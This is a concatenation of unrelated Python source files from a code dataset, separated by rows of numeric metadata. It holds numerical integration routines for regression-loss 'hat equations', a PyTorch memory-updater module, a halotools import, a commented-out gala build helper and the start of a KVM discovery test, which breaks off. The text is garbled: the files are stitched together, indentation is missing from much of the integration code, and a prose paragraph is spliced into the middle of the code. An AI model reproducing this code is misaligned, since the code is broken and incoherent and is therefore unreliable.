border_plus_L1,
border_minus_L1,
test_fun_upper_L1,
args,
args,
args,
)
integral_value = 0.0
for xi_funs, y_funs in zip(domain_xi, domain_y):
integral_value += dblquad(
m_integral_L1_single_noise,
xi_funs[0],
xi_funs[1],
y_funs[0],
y_funs[1],
args=(q, m, sigma, delta),
epsabs=EPSABS,
epsrel=EPSREL
)[0]
return integral_value
def q_hat_equation_L1_single_noise(m, q, sigma, delta):
borders = find_integration_borders_square(
lambda y, xi: q_integral_L1_single_noise(y, xi, q, m, sigma, delta),
np.sqrt((1 + delta)),
1.0,
)
args = {"m": m, "q": q, "sigma": sigma}
domain_xi, domain_y = domains_double_line_constraint(
borders,
border_plus_L1,
border_minus_L1,
test_fun_upper_L1,
args,
args,
args,
)
integral_value = 0.0
for xi_funs, y_funs in zip(domain_xi, domain_y):
integral_value += dblquad(
q_integral_L1_single_noise,
xi_funs[0],
xi_funs[1],
y_funs[0],
y_funs[1],
args=(q, m, sigma, delta),
epsabs=EPSABS,
epsrel=EPSREL
)[0]
return integral_value
def sigma_hat_equation_L1_single_noise(m, q, sigma, delta):
borders = find_integration_borders_square(
        lambda y, xi: sigma_integral_L1_single_noise(y, xi, q, m, sigma, delta),
np.sqrt((1 + delta)),
1.0,
)
args = {"m": m, "q": q, "sigma": sigma}
domain_xi, domain_y = domains_double_line_constraint(
borders,
border_plus_L1,
border_minus_L1,
test_fun_upper_L1,
args,
args,
args,
)
integral_value = 0.0
for xi_funs, y_funs in zip(domain_xi, domain_y):
integral_value += dblquad(
sigma_integral_L1_single_noise,
xi_funs[0],
xi_funs[1],
y_funs[0],
y_funs[1],
args=(q, m, sigma, delta),
epsabs=EPSABS,
epsrel=EPSREL
)[0]
return integral_value
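All the L1/Huber hat-equations above follow one pattern: split the integration square into sub-domains along the constraint lines, run `dblquad` on each piece, and sum. A stdlib-only sketch (a crude midpoint rule stands in for scipy's `dblquad`; purely illustrative, not the module's helpers) showing that summing per-domain integrals over a partition reproduces the whole-domain integral:

```python
# Crude composite midpoint rule over a rectangle, standing in for dblquad.
def midpoint_dblquad(f, x0, x1, y0, y1, n=200):
    hx, hy = (x1 - x0) / n, (y1 - y0) / n
    return sum(
        f(x0 + (i + 0.5) * hx, y0 + (j + 0.5) * hy)
        for i in range(n) for j in range(n)
    ) * hx * hy

f = lambda x, y: x * x + y           # any smooth integrand
whole = midpoint_dblquad(f, -1.0, 1.0, -1.0, 1.0)
# Partition the square along x = 0 and sum the pieces, as the
# *_hat_equation_* functions do over their constraint domains.
parts = (midpoint_dblquad(f, -1.0, 0.0, -1.0, 1.0)
         + midpoint_dblquad(f, 0.0, 1.0, -1.0, 1.0))
assert abs(whole - 4.0 / 3.0) < 1e-3   # exact value over [-1,1]^2 is 4/3
assert abs(whole - parts) < 1e-3
```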
# ------------------
# Huber equations single noise
# ------------------
def m_hat_equation_Huber_single_noise(m, q, sigma, delta, a):
borders = find_integration_borders_square(
lambda y, xi: m_integral_Huber_single_noise(y, xi, q, m, sigma, delta, a),
np.sqrt((1 + delta)),
1.0,
)
args = {"m": m, "q": q, "sigma": sigma, "a": a}
domain_xi, domain_y = domains_double_line_constraint(
borders,
border_plus_Huber,
border_minus_Huber,
test_fun_upper_Huber,
args,
args,
args,
)
integral_value = 0.0
for xi_funs, y_funs in zip(domain_xi, domain_y):
integral_value += dblquad(
m_integral_Huber_single_noise,
xi_funs[0],
xi_funs[1],
y_funs[0],
y_funs[1],
args=(q, m, sigma, delta, a),
epsabs=EPSABS,
epsrel=EPSREL
)[0]
return integral_value
def q_hat_equation_Huber_single_noise(m, q, sigma, delta, a):
borders = find_integration_borders_square(
lambda y, xi: q_integral_Huber_single_noise(y, xi, q, m, sigma, delta, a),
np.sqrt((1 + delta)),
1.0,
)
args = {"m": m, "q": q, "sigma": sigma, "a": a}
domain_xi, domain_y = domains_double_line_constraint(
borders,
border_plus_Huber,
border_minus_Huber,
test_fun_upper_Huber,
args,
args,
args,
)
integral_value = 0.0
for xi_funs, y_funs in zip(domain_xi, domain_y):
integral_value += dblquad(
q_integral_Huber_single_noise,
xi_funs[0],
xi_funs[1],
y_funs[0],
y_funs[1],
args=(q, m, sigma, delta, a),
epsabs=EPSABS,
epsrel=EPSREL
)[0]
return integral_value
def sigma_hat_equation_Huber_single_noise(m, q, sigma, delta, a):
borders = find_integration_borders_square(
lambda y, xi: sigma_integral_Huber_single_noise(y, xi, q, m, sigma, delta, a),
np.sqrt((1 + delta)),
1.0,
)
args = {"m": m, "q": q, "sigma": sigma, "a": a}
domain_xi, domain_y = domains_double_line_constraint_only_inside(
borders,
border_plus_Huber,
border_minus_Huber,
test_fun_upper_Huber,
args,
args,
args,
)
integral_value = 0.0
for xi_funs, y_funs in zip(domain_xi, domain_y):
integral_value += dblquad(
sigma_integral_Huber_single_noise,
xi_funs[0],
xi_funs[1],
y_funs[0],
y_funs[1],
args=(q, m, sigma, delta, a),
epsabs=EPSABS,
epsrel=EPSREL
)[0]
return integral_value
# ------------------
# BayesOpt equations double noise
# ------------------
def q_hat_equation_BO_double_noise(m, q, sigma, delta_small, delta_large, eps):
borders = find_integration_borders_square(
lambda y, xi: q_integral_BO_double_noise(
y, xi, q, m, sigma, delta_small, delta_large, eps
),
np.sqrt((1 + delta_small)),
1.0,
)
domain_xi, domain_y = divide_integration_borders_grid(borders)
integral_value = 0.0
for xi_funs, y_funs in zip(domain_xi, domain_y):
integral_value += dblquad(
q_integral_BO_double_noise,
xi_funs[0],
xi_funs[1],
y_funs[0],
y_funs[1],
args=(q, m, sigma, delta_small, delta_large, eps),
epsabs=EPSABS,
epsrel=EPSREL
)[0]
return integral_value
# ------------------
# L2 equations double noise
# ------------------
def m_hat_equation_L2_double_noise(m, q, sigma, delta_small, delta_large, eps):
borders = find_integration_borders_square(
lambda y, xi: m_integral_L2_double_noise(
y, xi, q, m, sigma, delta_small, delta_large, eps
),
np.sqrt((1 + delta_small)),
1.0,
)
domain_xi, domain_y = divide_integration_borders_grid(borders)
integral_value = 0.0
for xi_funs, y_funs in zip(domain_xi, domain_y):
integral_value += dblquad(
m_integral_L2_double_noise,
xi_funs[0],
xi_funs[1],
y_funs[0],
y_funs[1],
args=(q, m, sigma, delta_small, delta_large, eps),
epsabs=EPSABS,
epsrel=EPSREL
)[0]
return integral_value
def q_hat_equation_L2_double_noise(m, q, sigma, delta_small, delta_large, eps):
borders = find_integration_borders_square(
lambda y, xi: q_integral_L2_double_noise(
y, xi, q, m, sigma, delta_small, delta_large, eps
),
np.sqrt((1 + delta_small)),
1.0,
)
domain_xi, domain_y = divide_integration_borders_grid(borders)
integral_value = 0.0
for xi_funs, y_funs in zip(domain_xi, domain_y):
integral_value += dblquad(
q_integral_L2_double_noise,
xi_funs[0],
xi_funs[1],
y_funs[0],
y_funs[1],
args=(q, m, sigma, delta_small, delta_large, eps),
epsabs=EPSABS,
epsrel=EPSREL
)[0]
return integral_value
def sigma_hat_equation_L2_double_noise(m, q, sigma, delta_small, delta_large, eps):
borders = find_integration_borders_square(
lambda y, xi: sigma_integral_L2_double_noise(
y, xi, q, m, sigma, delta_small, delta_large, eps
),
np.sqrt((1 + delta_small)),
1.0,
)
domain_xi, domain_y = divide_integration_borders_grid(borders)
integral_value = 0.0
for xi_funs, y_funs in zip(domain_xi, domain_y):
integral_value += dblquad(
sigma_integral_L2_double_noise,
xi_funs[0],
xi_funs[1],
y_funs[0],
y_funs[1],
args=(q, m, sigma, delta_small, delta_large, eps),
epsabs=EPSABS,
epsrel=EPSREL
)[0]
return integral_value
# ------------------
# L1 equations double noise
# ------------------
# ------------------
# Huber equations double noise
# ------------------
def m_hat_equation_Huber_double_noise(m, q, sigma, delta_small, delta_large, eps, a):
borders = find_integration_borders_square(
lambda y, xi: m_integral_Huber_double_noise(
y, xi, q, m, sigma, delta_small, delta_large, eps, a
),
np.sqrt((1 + delta_small)),
1.0,
)
args = {"m": m, "q": q, "sigma": sigma, "a": a}
domain_xi, domain_y = domains_double_line_constraint(
borders,
border_plus_Huber,
border_minus_Huber,
test_fun_upper_Huber,
args,
args,
args,
)
integral_value = 0.0
for xi_funs, y_funs in zip(domain_xi, domain_y):
integral_value += dblquad(
m_integral_Huber_double_noise,
xi_funs[0],
xi_funs[1],
y_funs[0],
y_funs[1],
args=(q, m, sigma, delta_small, delta_large, eps, a),
epsabs=EPSABS,
epsrel=EPSREL
)[0]
return integral_value
def q_hat_equation_Huber_double_noise(m, q, sigma, delta_small, delta_large, eps, a):
borders = find_integration_borders_square(
lambda y, xi: q_integral_Huber_double_noise(
y, xi, q, m, sigma, delta_small, delta_large, eps, a
),
np.sqrt((1 + delta_small)),
1.0,
)
args = {"m": m, "q": q, "sigma": sigma, "a": a}
domain_xi, domain_y = domains_double_line_constraint(
borders,
border_plus_Huber,
border_minus_Huber,
test_fun_upper_Huber,
args,
args,
args,
)
integral_value = 0.0
for xi_funs, y_funs in zip(domain_xi, domain_y):
integral_value += dblquad(
q_integral_Huber_double_noise,
xi_funs[0],
xi_funs[1],
y_funs[0],
y_funs[1],
args=(q, m, sigma, delta_small, delta_large, eps, a),
epsabs=EPSABS,
epsrel=EPSREL
)[0]
return integral_value
def sigma_hat_equation_Huber_double_noise(m, q, sigma, delta_small, delta_large, eps, a):
borders = find_integration_borders_square(
lambda y, xi: sigma_integral_Huber_double_noise(
y, xi, q, m, sigma, delta_small, delta_large, eps, a
),
np.sqrt((1 + delta_small)),
1.0,
)
args = {"m": m, "q": q, "sigma": sigma, "a": a}
domain_xi, domain_y = domains_double_line_constraint_only_inside(
borders,
border_plus_Huber,
border_minus_Huber,
test_fun_upper_Huber,
args,
args,
args,
)
integral_value = 0.0
for xi_funs, y_funs in zip(domain_xi, domain_y):
integral_value += dblquad(
sigma_integral_Huber_double_noise,
xi_funs[0],
xi_funs[1],
y_funs[0],
y_funs[1],
args=(q, m, sigma, delta_small, delta_large, eps, a),
epsabs=EPSABS,
epsrel=EPSREL
)[0]
return integral_value
# ------------------
# BayesOpt equations decorrelated noise
# ------------------
def q_hat_equation_BO_decorrelated_noise(m, q, sigma, delta_small, delta_large, eps, beta):
borders = find_integration_borders_square(
lambda y, xi: q_integral_BO_decorrelated_noise(
y, xi, q, m, sigma, delta_small, delta_large, eps, beta
),
np.sqrt((1 + delta_small)),
1.0,
)
domain_xi, domain_y = divide_integration_borders_grid(borders)
integral_value = 0.0
for xi_funs, y_funs in zip(domain_xi, domain_y):
integral_value += dblquad(
q_integral_BO_decorrelated_noise,
xi_funs[0],
xi_funs[1],
y_funs[0],
y_funs[1],
args=(q, m, sigma, delta_small, delta_large, eps, beta),
)[0]
return integral_value
# ------------------
# L2 equations decorrelated noise
# ------------------
def m_hat_equation_L2_decorrelated_noise(m, q, sigma, delta_small, delta_large, eps, beta):
    borders = find_integration_borders_square(
        lambda y, xi: m_integral_L2_decorrelated_noise(
            y, xi, q, m, sigma, delta_small, delta_large, eps, beta
        ),
        np.sqrt((1 + delta_small)),
        1.0,
    )
    domain_xi, domain_y = divide_integration_borders_grid(borders)
    integral_value = 0.0
    for xi_funs, y_funs in zip(domain_xi, domain_y):
        integral_value += dblquad(
            m_integral_L2_decorrelated_noise,
            xi_funs[0],
            xi_funs[1],
            y_funs[0],
            y_funs[1],
            args=(q, m, sigma, delta_small, delta_large, eps, beta),
        )[0]
    return integral_value
def q_hat_equation_L2_decorrelated_noise(m, q, sigma, delta_small, delta_large, eps, beta):
    borders = find_integration_borders_square(
        lambda y, xi: q_integral_L2_decorrelated_noise(
            y, xi, q, m, sigma, delta_small, delta_large, eps, beta
        ),
        np.sqrt((1 + delta_small)),
        1.0,
    )
    domain_xi, domain_y = divide_integration_borders_grid(borders)
    integral_value = 0.0
    for xi_funs, y_funs in zip(domain_xi, domain_y):
        integral_value += dblquad(
            q_integral_L2_decorrelated_noise,
            xi_funs[0],
            xi_funs[1],
            y_funs[0],
            y_funs[1],
            args=(q, m, sigma, delta_small, delta_large, eps, beta),
        )[0]
    return integral_value
def sigma_hat_equation_L2_decorrelated_noise(m, q, sigma, delta_small, delta_large, eps, beta):
    borders = find_integration_borders_square(
        lambda y, xi: sigma_integral_L2_decorrelated_noise(
            y, xi, q, m, sigma, delta_small, delta_large, eps, beta
        ),
        np.sqrt((1 + delta_small)),
        1.0,
    )
    domain_xi, domain_y = divide_integration_borders_grid(borders)
    integral_value = 0.0
    for xi_funs, y_funs in zip(domain_xi, domain_y):
        integral_value += dblquad(
            sigma_integral_L2_decorrelated_noise,
            xi_funs[0],
            xi_funs[1],
            y_funs[0],
            y_funs[1],
            args=(q, m, sigma, delta_small, delta_large, eps, beta),
        )[0]
    return integral_value
# ------------------
# L1 equations decorrelated noise
# ------------------
# ------------------
# Huber equations decorrelated noise
# ------------------
def m_hat_equation_Huber_decorrelated_noise(m, q, sigma, delta_small, delta_large, eps, beta, a):
borders = find_integration_borders_square(
lambda y, xi: m_integral_Huber_decorrelated_noise(
y, xi, q, m, sigma, delta_small, delta_large, eps, beta, a
),
np.sqrt((1 + delta_small)),
1.0,
)
args = {"m": m, "q": q, "sigma": sigma, "a": a}
domain_xi, domain_y = domains_double_line_constraint(
borders,
border_plus_Huber,
border_minus_Huber,
test_fun_upper_Huber,
args,
args,
args,
)
integral_value = 0.0
for xi_funs, y_funs in zip(domain_xi, domain_y):
integral_value += dblquad(
m_integral_Huber_decorrelated_noise,
xi_funs[0],
xi_funs[1],
y_funs[0],
y_funs[1],
args=(q, m, sigma, delta_small, delta_large, eps, beta, a),
)[0]
return integral_value
def q_hat_equation_Huber_decorrelated_noise(m, q, sigma, delta_small, delta_large, eps, beta, a):
borders = find_integration_borders_square(
lambda y, xi: q_integral_Huber_decorrelated_noise(
y, xi, q, m, sigma, delta_small, delta_large, eps, beta, a
),
np.sqrt((1 + delta_small)),
1.0,
)
args = {"m": m, "q": q, "sigma": sigma, "a": a}
domain_xi, domain_y = domains_double_line_constraint(
borders,
border_plus_Huber,
border_minus_Huber,
test_fun_upper_Huber,
args,
args,
args,
)
integral_value = 0.0
for xi_funs, y_funs in zip(domain_xi, domain_y):
integral_value += dblquad(
q_integral_Huber_decorrelated_noise,
xi_funs[0],
xi_funs[1],
y_funs[0],
y_funs[1],
args=(q, m, sigma, delta_small, delta_large, eps, beta, a),
)[0]
return integral_value
def sigma_hat_equation_Huber_decorrelated_noise(m, q, sigma, delta_small, delta_large, eps, beta, a):
borders = find_integration_borders_square(
lambda y, xi: sigma_integral_Huber_decorrelated_noise(
y, xi, q, m, sigma, delta_small, delta_large, eps, beta, a
),
np.sqrt((1 + delta_small)),
1.0,
)
args = {"m": m, "q": q, "sigma": sigma, "a": a}
    domain_xi, domain_y = domains_double_line_constraint_only_inside(
borders,
border_plus_Huber,
border_minus_Huber,
test_fun_upper_Huber,
args,
args,
args,
)
integral_value = 0.0
for xi_funs, y_funs in zip(domain_xi, domain_y):
integral_value += dblquad(
sigma_integral_Huber_decorrelated_noise,
xi_funs[0],
xi_funs[1],
y_funs[0],
y_funs[1],
args=(q, m, sigma, delta_small, delta_large, eps, beta, a),
)[0]
return integral_value | 27.804625 | 112 | 0.557547 | 4,814 | 34,867 | 3.779809 | 0.021811 | 0.03825 | 0.065949 | 0.087931 | 0.964278 | 0.960266 | 0.948945 | 0.932568 | 0.924324 | 0.909705 | 0 | 0.022437 | 0.298248 | 34,867 | 1,254 | 113 | 27.804625 | 0.721228 | 0.031176 | 0 | 0.745605 | 0 | 0 | 0.007798 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.070321 | false | 0 | 0.004137 | 0.01758 | 0.149948 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
4343fb0d359e2ee63fe73f9a5976758b6d07bf96 | 6,346 | py | Python | modules/memory_updater.py | pige99/TME | b069ed159c6ae8835591af13b3fb2bc418e2fef9 | [
"MIT"
] | 3 | 2021-07-26T04:52:25.000Z | 2022-02-10T04:33:44.000Z | modules/memory_updater.py | pige99/TME | b069ed159c6ae8835591af13b3fb2bc418e2fef9 | [
"MIT"
] | null | null | null | modules/memory_updater.py | pige99/TME | b069ed159c6ae8835591af13b3fb2bc418e2fef9 | [
"MIT"
] | null | null | null | from torch import nn
import torch
import time
class MemoryUpdater(nn.Module):
def update_memory(self, unique_node_ids, unique_messages, timestamps):
pass
class SequenceMemoryUpdater(MemoryUpdater):
def __init__(self, memory, message_dimension, memory_dimension, device):
super(SequenceMemoryUpdater, self).__init__()
self.memory = memory
self.layer_norm = torch.nn.LayerNorm(memory_dimension)
self.message_dimension = message_dimension
self.device = device
def update_memory(self, unique_node_ids, unique_messages, timestamps):
if len(unique_node_ids) <= 0:
return
assert (self.memory.get_last_update(unique_node_ids) <= timestamps).all().item(), "Trying to " \
"update memory to time in the past"
memory = self.memory.get_memory(unique_node_ids)
self.memory.last_update[unique_node_ids] = timestamps
updated_memory = self.memory_updater(unique_messages, memory)
self.memory.set_memory(unique_node_ids, updated_memory)
def get_updated_memory(self, unique_node_ids, unique_messages, timestamps):
if len(unique_node_ids) <= 0:
return self.memory.memory.data.clone(), self.memory.last_update.data.clone()
assert (self.memory.get_last_update(unique_node_ids) <= timestamps).all().item(), "Trying to " \
"update memory to time in the past"
updated_memory = self.memory.memory.data.clone()
updated_memory[unique_node_ids] = self.memory_updater(unique_messages, updated_memory[unique_node_ids])
updated_last_update = self.memory.last_update.data.clone()
updated_last_update[unique_node_ids] = timestamps
return updated_memory, updated_last_update
class RNNMemoryUpdater(SequenceMemoryUpdater):
def __init__(self, memory, message_dimension, memory_dimension, device):
super(RNNMemoryUpdater, self).__init__(memory, message_dimension, memory_dimension, device)
self.memory_updater = nn.RNNCell(input_size=message_dimension,
hidden_size=memory_dimension)
class GRUMemoryUpdater(nn.Module):
def __init__(self, memory, message_dimension, memory_dimension, device):
super(GRUMemoryUpdater, self).__init__()
self.memory = memory
# self.layer_norm = torch.nn.LayerNorm(memory_dimension)
self.message_dimension = message_dimension
self.device = device
self.memory_updater = nn.GRUCell(input_size=message_dimension,
hidden_size=memory_dimension)
def update_memory(self, unique_node_ids, unique_messages, timestamps):
if len(unique_node_ids) <= 0:
return
assert (self.memory.get_last_update(unique_node_ids) <= timestamps).all().item(), "Trying to " \
"update memory to time in the past"
memory = self.memory.get_memory(unique_node_ids)
self.memory.last_update[unique_node_ids] = timestamps
updated_memory = self.memory_updater(unique_messages, memory)
self.memory.set_memory(unique_node_ids, updated_memory)
def get_updated_memory(self, unique_node_ids, unique_messages, timestamps):
if len(unique_node_ids) <= 0:
return self.memory.memory.data.clone(), self.memory.last_update.data.clone()
assert (self.memory.get_last_update(unique_node_ids) <= timestamps).all().item(), "Trying to " \
"update memory to time in the past"
updated_memory = self.memory.memory.data.clone()
updated_memory[unique_node_ids] = self.memory_updater(unique_messages, updated_memory[unique_node_ids])
updated_last_update = self.memory.last_update.data.clone()
updated_last_update[unique_node_ids] = timestamps
return updated_memory, updated_last_update
class GRULongMemoryUpdater(nn.Module):
def __init__(self, memory, message_dimension, memory_dimension, device):
super(GRULongMemoryUpdater, self).__init__()
self.memory = memory
# self.layer_norm = torch.nn.LayerNorm(memory_dimension)
self.message_dimension = message_dimension
self.device = device
self.memory_updater = nn.GRU(input_size=message_dimension,
hidden_size=memory_dimension)
def update_memory(self, unique_node_ids, unique_messages, timestamps):
if len(unique_node_ids) <= 0:
return
assert (self.memory.get_last_update(unique_node_ids) <= timestamps).all().item(), "Trying to " \
"update memory to time in the past"
memory = self.memory.get_memory(unique_node_ids)
self.memory.last_update[unique_node_ids] = timestamps
outputs, h_n = self.memory_updater(unique_messages, torch.unsqueeze(memory, 0))
updated_memory = torch.squeeze(h_n)
self.memory.set_memory(unique_node_ids, updated_memory)
def get_updated_memory(self, unique_node_ids, unique_messages, timestamps):
if len(unique_node_ids) <= 0:
return self.memory.memory.data.clone(), self.memory.last_update.data.clone()
assert (self.memory.get_last_update(unique_node_ids) <= timestamps).all().item(), "Trying to " \
"update memory to time in the past"
updated_memory = self.memory.memory.data.clone()
outputs, h_n = self.memory_updater(unique_messages,
torch.unsqueeze(updated_memory[unique_node_ids], 0))
updated_memory[unique_node_ids] = torch.squeeze(h_n)
updated_last_update = self.memory.last_update.data.clone()
updated_last_update[unique_node_ids] = timestamps
return updated_memory, updated_last_update
def get_memory_updater(module_type, memory, message_dimension, memory_dimension, device):
if module_type == "gru":
return GRUMemoryUpdater(memory, message_dimension, memory_dimension, device)
elif module_type == "rnn":
return RNNMemoryUpdater(memory, message_dimension, memory_dimension, device)
    elif module_type == "gru_long":
return GRULongMemoryUpdater(memory, message_dimension, memory_dimension, device)
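The `get_updated_memory` methods above all follow the same contract: clone the stored memory, apply the updater only to the rows of the touched node ids, and leave the stored state unmodified. A torch-free sketch of that contract (names and the plain-list representation are illustrative, not the module's API):

```python
# Illustrative, torch-free version of the get_updated_memory contract:
# work on a clone, overwrite only the touched rows, never mutate the input.
def get_updated_memory(memory, last_update, node_ids, messages, timestamps,
                       updater):
    updated_memory = [row[:] for row in memory]   # per-row clone
    updated_last_update = last_update[:]
    for nid, msg, ts in zip(node_ids, messages, timestamps):
        assert last_update[nid] <= ts, "Trying to update memory to time in the past"
        updated_memory[nid] = updater(msg, memory[nid])
        updated_last_update[nid] = ts
    return updated_memory, updated_last_update

mem = [[0.0], [1.0], [2.0]]
lu = [0, 0, 0]
new_mem, new_lu = get_updated_memory(
    mem, lu, node_ids=[1], messages=[[5.0]], timestamps=[3],
    updater=lambda msg, row: [row[0] + msg[0]],
)
assert mem == [[0.0], [1.0], [2.0]] and lu == [0, 0, 0]   # inputs untouched
assert new_mem[1] == [6.0] and new_lu == [0, 3, 0]        # only node 1 updated
```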
| 43.465753 | 120 | 0.684841 | 755 | 6,346 | 5.419868 | 0.084768 | 0.105083 | 0.117546 | 0.058651 | 0.888563 | 0.871212 | 0.839687 | 0.839687 | 0.827468 | 0.799609 | 0 | 0.00163 | 0.226599 | 6,346 | 145 | 121 | 43.765517 | 0.832111 | 0.017176 | 0 | 0.712871 | 0 | 0 | 0.043632 | 0 | 0 | 0 | 0 | 0 | 0.059406 | 1 | 0.118812 | false | 0.009901 | 0.029703 | 0 | 0.316832 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
4ac478638285654ac9520e71281a3b55693cdbdf | 79 | py | Python | halotools/empirical_models/abunmatch/engines/__init__.py | pllim/halotools | 6499cff09e7e0f169e4f425ee265403f6be816e8 | [
"BSD-3-Clause"
] | 83 | 2015-01-15T14:54:16.000Z | 2021-12-09T11:28:02.000Z | halotools/empirical_models/abunmatch/engines/__init__.py | pllim/halotools | 6499cff09e7e0f169e4f425ee265403f6be816e8 | [
"BSD-3-Clause"
] | 579 | 2015-01-14T15:57:37.000Z | 2022-01-13T18:58:44.000Z | halotools/empirical_models/abunmatch/engines/__init__.py | pllim/halotools | 6499cff09e7e0f169e4f425ee265403f6be816e8 | [
"BSD-3-Clause"
] | 70 | 2015-01-14T15:15:58.000Z | 2021-12-22T18:18:31.000Z | from .bin_free_cam_kernel import cython_bin_free_cam_kernel, get_value_at_rank
| 39.5 | 78 | 0.911392 | 15 | 79 | 4.133333 | 0.733333 | 0.225806 | 0.322581 | 0.516129 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.063291 | 79 | 1 | 79 | 79 | 0.837838 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 8 |
436ce6ac48819c289862a23c3aa5c5d12e6d9738 | 2,624 | py | Python | gala/potential/setup_package.py | ltlancas/gala | 2621bb599d67e74a85446abf72d5930ef70ca181 | [
"MIT"
] | 1 | 2021-10-14T03:36:15.000Z | 2021-10-14T03:36:15.000Z | gala/potential/setup_package.py | ltlancas/gala | 2621bb599d67e74a85446abf72d5930ef70ca181 | [
"MIT"
] | null | null | null | gala/potential/setup_package.py | ltlancas/gala | 2621bb599d67e74a85446abf72d5930ef70ca181 | [
"MIT"
] | null | null | null | # from __future__ import absolute_import
# from distutils.core import Extension
# from astropy_helpers import setup_helpers
# def get_extensions():
# exts = []
# # malloc
# mac_incl_path = "/usr/include/malloc"
# # Potentials
# cfg = setup_helpers.DistutilsExtensionArgs()
# cfg['include_dirs'].append('numpy')
# cfg['include_dirs'].append(mac_incl_path)
# cfg['include_dirs'].append('gala/potential')
# cfg['extra_compile_args'].append('--std=gnu99')
# cfg['sources'].append('gala/potential/cpotential.pyx')
# cfg['sources'].append('gala/potential/src/cpotential.c')
# exts.append(Extension('gala.potential.cpotential', **cfg))
# cfg = setup_helpers.DistutilsExtensionArgs()
# cfg['include_dirs'].append('numpy')
# cfg['include_dirs'].append(mac_incl_path)
# cfg['include_dirs'].append('gala/potential')
# cfg['extra_compile_args'].append('--std=gnu99')
# cfg['sources'].append('gala/potential/ccompositepotential.pyx')
# cfg['sources'].append('gala/potential/src/cpotential.c')
# exts.append(Extension('gala.potential.ccompositepotential', **cfg))
# cfg = setup_helpers.DistutilsExtensionArgs()
# cfg['include_dirs'].append('numpy')
# cfg['include_dirs'].append(mac_incl_path)
# cfg['include_dirs'].append('gala/potential')
# cfg['extra_compile_args'].append('--std=gnu99')
# cfg['sources'].append('gala/potential/builtin/cybuiltin.pyx')
# cfg['sources'].append('gala/potential/builtin/src/builtin_potentials.c')
# cfg['sources'].append('gala/potential/src/cpotential.c')
# exts.append(Extension('gala.potential.builtin.cybuiltin', **cfg))
# # Frames
# cfg = setup_helpers.DistutilsExtensionArgs()
# cfg['include_dirs'].append('numpy')
# cfg['include_dirs'].append(mac_incl_path)
# cfg['include_dirs'].append('gala/potential')
# cfg['extra_compile_args'].append('--std=gnu99')
# cfg['sources'].append('gala/potential/cframe.pyx')
# exts.append(Extension('gala.potential.cframe', **cfg))
# cfg = setup_helpers.DistutilsExtensionArgs()
# cfg['include_dirs'].append('numpy')
# cfg['include_dirs'].append(mac_incl_path)
# cfg['include_dirs'].append('gala/potential')
# cfg['extra_compile_args'].append('--std=gnu99')
# cfg['sources'].append('gala/potential/builtin/frames.pyx')
# cfg['sources'].append('gala/potential/builtin/src/builtin_frames.c')
# exts.append(Extension('gala.potential.builtin.frames', **cfg))
# return exts
def get_package_data():
return {'gala.potential': ['src/funcdefs.h', 'potential/src/cpotential.h']}
| 41.650794 | 79 | 0.685595 | 308 | 2,624 | 5.665584 | 0.155844 | 0.156447 | 0.120344 | 0.17192 | 0.785673 | 0.767335 | 0.767335 | 0.740401 | 0.740401 | 0.684241 | 0 | 0.004373 | 0.12843 | 2,624 | 62 | 80 | 42.322581 | 0.758636 | 0.916921 | 0 | 0 | 0 | 0 | 0.331288 | 0.159509 | 0 | 0 | 0 | 0 | 0 | 1 | 0.5 | true | 0 | 0 | 0.5 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 1 | 1 | 0 | 0 | 11 |
43890a5c77fd8b2bff1f236f98669e7a0d290d4e | 18,538 | py | Python | enjoliver-testsuite/euid/discovery/test_kvm_discovery_client.py | netturpin/enjoliver | 9700470939da40ff84304af6e8c7210a5fd693a4 | [
"MIT"
] | 11 | 2017-11-06T08:42:55.000Z | 2021-01-08T11:01:02.000Z | enjoliver-testsuite/euid/discovery/test_kvm_discovery_client.py | netturpin/enjoliver | 9700470939da40ff84304af6e8c7210a5fd693a4 | [
"MIT"
] | 7 | 2017-12-28T12:05:50.000Z | 2021-04-02T15:04:46.000Z | enjoliver-testsuite/euid/discovery/test_kvm_discovery_client.py | netturpin/enjoliver | 9700470939da40ff84304af6e8c7210a5fd693a4 | [
"MIT"
] | 4 | 2017-11-08T10:03:31.000Z | 2018-06-03T17:59:43.000Z | import os
import sys
import time
import unittest
from enjoliver import generator
try:
import kvm_player
except ImportError:
sys.path.append(os.path.dirname(os.path.dirname(os.path.abspath(__file__))))
import kvm_player
class TestKVMDiscoveryClient(kvm_player.KernelVirtualMachinePlayer):
@classmethod
def setUpClass(cls):
cls.set_rack0()
cls.running_requirements()
cls.set_api()
cls.set_matchbox()
cls.set_dnsmasq()
cls.pause(cls.wait_setup_teardown)
class TestKVMDiscoveryClient00(TestKVMDiscoveryClient):
"""
node_nb: 1
Interfaces
"""
def test_00(self):
marker = "euid-%s-%s" % (TestKVMDiscoveryClient.__name__.lower(), self.test_00.__name__)
gen = generator.Generator(
api_uri=self.api_uri,
profile_id="%s" % marker,
name="%s" % marker,
ignition_id="%s.yaml" % marker,
matchbox_path=self.test_matchbox_path
)
gen.dumps()
self.clean_up_virtual_machine(marker)
interfaces = {}
try:
virt_install = self.create_virtual_machine(marker, 1)
self.virsh(virt_install, assertion=True, v=self.dev_null)
